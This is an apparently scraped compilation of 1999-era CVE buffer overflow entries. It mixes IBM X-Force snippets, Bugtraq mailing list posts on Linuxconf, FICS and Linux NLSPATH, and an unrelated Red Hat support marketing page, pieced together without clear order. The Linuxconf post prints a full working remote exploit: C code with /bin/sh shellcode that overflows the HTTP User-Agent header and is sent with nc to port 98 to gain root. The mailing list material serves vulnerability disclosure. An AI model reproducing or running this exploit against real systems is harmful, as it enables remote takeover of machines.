Buffer overflow in Netscape Communicator before 4.7 via a dynamic font whose length field is less than the size of the font.

CVE-1999-0892: IBM X-Force Exchange

Buffer overflow in Linux linuxconf package allows remote attackers to gain root privileges via a long parameter.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 
**List:       bugtraq
Subject:    (Possible) Linuxconf Remote Buffer Overflow Vulnerability
From:       Elias Levy <aleph1 () SECURITYFOCUS ! COM>
Date:       1999-12-21 18:31:14
\[Download RAW message or body\]**

There may exists a buffer overflow vulnerability in the Linuxconf package
shipped with some version of Linux systems. The vulnerability may
be in the program's handling of HTTP headers. Initial testing with
Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If other can
test the exploit and report their results it would be appreciated.

This is an example of what good can happen from sharing security
incident information. There have been reports in the INCIDENTS mailing
list for several months now of scans for port 98. Since no
publicly known major vulnerabilities existed in this service the
traffic was somewhat strange. After some digging around
Jon Starnaud <jon.starnaud@rci.com> was able to find this exploit.

If you are not subscribed to INCIDENTS and wish to share incident
information I suggest you sign up. If the vulnerability does exists
this would be the second vulnerability we discover thanks to sharing
incident information (the first one being sadmind).

http://www.securityfocus.com/forums/incidents/faq.html

/\*

  linuxconf exploit by R00T-X (c) 1999

  USER\_AGENT overflow x86
  should work on all linux's but you need to have
  network access to linuxconf

  greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P

  have fun with this but for EDUCATIONAL PURPOSES :)

  Usage:   (./linexp <offset>;cat)| nc targethost 98

 \*/

char shell\[\] =
"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90"
"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90"
"\\x90\\x90\\x90\\xeb\\x3b\\x5e\\x89\\x76\\x08\\x31\\xed\\x31\\xc9\\x31\\xc0\\x88"
"\\x6e\\x07\\x89\\x6e\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x6e\\x08\\x89\\xe9\\x8d\\x6e"
"\\x0c\\x89\\xea\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\x90\\x90\\x90\\x90"
"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90"
"\\xe8\\xc0\\xff\\xff\\xff/bin/sh\\x00";

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 1025
#define NOP 0x90

void
main (int argc, char \*argv\[\])
{
  char buf\[BUFLEN\];
  int offset,nop,i;
  unsigned long esp;
  char shell\[1024+300\];

  if(argc < 2)
  {
  fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\\n", argv\[0\]);
  exit(0);
  }

  nop = 511;
  esp = 0xefbfd5e8;
  offset = atoi(argv\[1\]);

  memset(buf, NOP, BUFLEN);
  memcpy(buf+(long)nop, shell, strlen(shell));

  for (i = 256; i < BUFLEN - 3; i += 2)
{    \*((int \*) &buf\[i\]) = esp + (long) offset;
     shell\[ sizeof(shell)-1 \] = 0;
}

 printf("POST / HTTP/1.0\\r\\nContent-Length: %d, User-agent: \\r\\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf\[i\]);

  printf("\\r\\n");

  return;
}


--
Elias Levy
Security Focus
http://www.securityfocus.com/

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 

  

Configure | About | News | Add a list | Sponsored by KoreLogic

CVE-2000-0017: '(Possible) Linuxconf Remote Buffer Overflow Vulnerability'

Buffer overflow in free internet chess server (FICS) program, xboard.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 
**List:       bugtraq
Subject:    Re: FICS buffer overflow
From:       Lionman <rohrerm () UNIX2 ! KSU ! EDU>
Date:       1999-11-30 19:59:20
\[Download RAW message or body\]**

I should note that FICS development has been closed since 96.  I would
guess 1.7.something is the server version being used since I didn't
have this problem and I use 1.6.2 for my server.  From the work
I have done on the server, I have noticed there are many bugs in the
released sources for the server and talking about another bug is
more or less beating a dead horse.  Simply, if someone is going
to run a server, a lot of work must be done to get it stable.

Michael Rohrer

On Mon, Nov 29, 1999 at 02:57:30PM -0500, canul wrote:
> While documenting the FICS (free internet chess server) protocol for
> purposes of an alternative to the xboard program, I encountered what looks
> to be a potential for attack. This vulnerability has been verified by one
> of the largest fics based systems, chess.net <http://www.chess.net\>.
>
> The problem involves unchecked user input to a fixed length
> string. Non-denial of services exploitation of the questionable code looks
> possible but not trivial, as there is not room in the buffer for shell
> code, but putting it elsewhere is certainly a possibility. I have written
> a patch that resolves the problem, in some fashion.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 

  

Configure | About | News | Add a list | Sponsored by KoreLogic

CVE-1999-0847: 'Re: FICS buffer overflow' - MARC

Buffer overflow in SCO su program allows local users to gain root access via a long username.

CVE-1999-0845: IBM X-Force Exchange

Buffer overflow in FreeBSD seyon via HOME environmental variable, -emulator argument, -modems argument, or the GUI.

CVE-1999-0863: IBM X-Force Exchange

Buffer overflow in SCO UnixWare Xsco command via a long argument.

CVE-1999-0830: IBM X-Force Exchange

Buffer overflow in WU-FTPD and related FTP servers allows remote attackers to gain root privileges via macro variables in a message file.

CVE-1999-0879: IBM X-Force Exchange

Buffer overflow in Solaris libc, ufsrestore, and rcp via LC_MESSAGES environmental variable.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 
**List:       bugtraq
Subject:    Re: Linux NLSPATH buffer overflow
From:       Alan Cox <alan () LXORGUK ! UKUU ! ORG ! UK>
Date:       1997-02-14 20:51:02
\[Download RAW message or body\]**

> I'm sorry if the information I'm going to tell about was already known, but
> I hope it wasn't...

Its known, its fixed in current setups

> It might be possible to exploit this hole remotely, if using a patched telnet
> client which would allow exporting large environment variable values. The
> overflow would happen at /bin/login startup then (somewhat like the famous
> LD\_PRELOAD exploit, but an overflow). I'm not sure of that though, there might
> be some restrictions on environment variables in telnetd.

Netkit 0.08/9 telnetd do not pass any environment variables,

> As for the fix, well, this is a hard one -- would require re-compiling libc,
> and statically linked binaries. To protect yourself against remote attacks,
> you could for example change the variable name to something different, with
> a hex editor (like /usr/bin/bpe), in /lib/libc.so.5, and ensure the exploit
> stopped working. Of course, this is only a temporary fix.

libc5.4 is immune, RedHat has been shipping the fixed libc5.3.12 for a long
time, and all the vendors I had security contacts for where told ages ago.
If they haven't fixed it then Im disappointed with them, they dont have
an excuse. That libc5.3.12 unpatched also has other fun bugs with buffer
overruns in libc some in the BSD stuff akin to the BSD bugs in rcmd() etc.

Alan

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 

  

Configure | About | News | Add a list | Sponsored by KoreLogic

CVE-1999-0767: 'Re: Linux NLSPATH buffer overflow'

Buffer overflows in Red Hat net-tools package.

Skip to content

*   *   Console
    *   Support
    *   Developers
    *   Partners
    *   redhat.com
    *   Start a trial
    

Contact us

Welcome,

Log in to your Red Hat account

Log in

Your Red Hat account gives you access to your member profile and preferences, and the following services based on your customer status:

*   Customer Portal
*   Red Hat Connect for Business Partners

*   User management
*   Certification Central

Register now

Not registered yet? Here are a few reasons why you should be:

*   Browse Knowledgebase articles, manage support cases and subscriptions, download updates, and more from one place.
*   View users in your organization, and edit their account information, preferences, and permissions.
*   Manage your Red Hat certifications, view exam history, and download certification-related logos and documents.

For your security, if you're on a public computer and have finished using your Red Hat services, please be sure to log out.

Log out

Account Log in

*   Products
*   Solutions
*   Services & support
*   Resources
*   Red Hat & open source

**Red Hat Support****Go beyond support by engaging with our experts**

Our teams collaborate with you to ensure you accomplish your goals with Red Hat solutions. The relationship we build with you is designed to provide you with the tools and resources you need to find success on your IT journey.

**Configured for your success**

We develop a holistic understanding of your experience as a customer by ensuring our support and engineering teams work together.

Our support team works hand in hand with the best engineers in the industry to quickly turn customer feedback into product improvements. This direct line of communication allows us to hone in on proactive fixes that can impact your bottom line.

**Find the right level of support**

We have different tiers of support designed to meet your unique needs.

**Self-support**

**Standard**

**Premium**

Access to Red Hat products

Access to our knowledgebase and tools in our  
award-winning Customer Portal

Access to support engineers during standard business hours

Access to support engineers 24x7 for high-severity issues

We also feature specialized support options that can be tailored to the unique needs of companies of all sizes and industries. The Red Hat® Enhanced Solution Support offering reduces downtime and boosts confidence through access to senior level engineers, as well as resolution and restoration SLAs—helping you stay up and running as you innovate, scale, and deploy. Our engineers help restore your operations quickly and accelerate the path to final resolution, identifying the root cause which helps protect against recurrences in the future. Enhanced Solution Support engineers, who are already familiar with your environment, will be there to assist with critical issues in production environments so that you can consistently deliver the cloud services your customers demand. This offering is available for Red Hat OpenShift® and Red Hat OpenStack® Platform customers.

**Personalized support**

Connect with a technical adviser for collaborative planning and specialized guidance. Our Technical Account Managers help you streamline deployments, resolve issues, and shape your technology strategy to meet your toughest business challenges.

Explore Technical Account Management

**Award winners since 2011**

We’ve evolved the traditional software subscription model, combining the best elements of our services to exceed customer expectations. The Association of Support Professionals has honored Red Hat’s Customer Portal as one of “The Top Ten Best Support Websites” for 9 years running.

See why the Customer Portal keeps earning industry recognition

**What they're saying**

> We have found the support from Red Hat to be exemplary. Whenever we need anything from them, they have given it … Red Hat is now our backbone. Our business cannot run if Red Hat is not there.

> We cannot afford the service to go down. Too many people depend on it. Red Hat is a trusted vendor. Our customers can have faith in us...If there is an issue, Red Hat support means it can be addressed quickly.

**Check out our support channels**

**Have questions?**

CVE-1999-0748: Support

mSQL v2.0.1 and below allows remote execution through a buffer overflow.

Tag

#buffer_overflow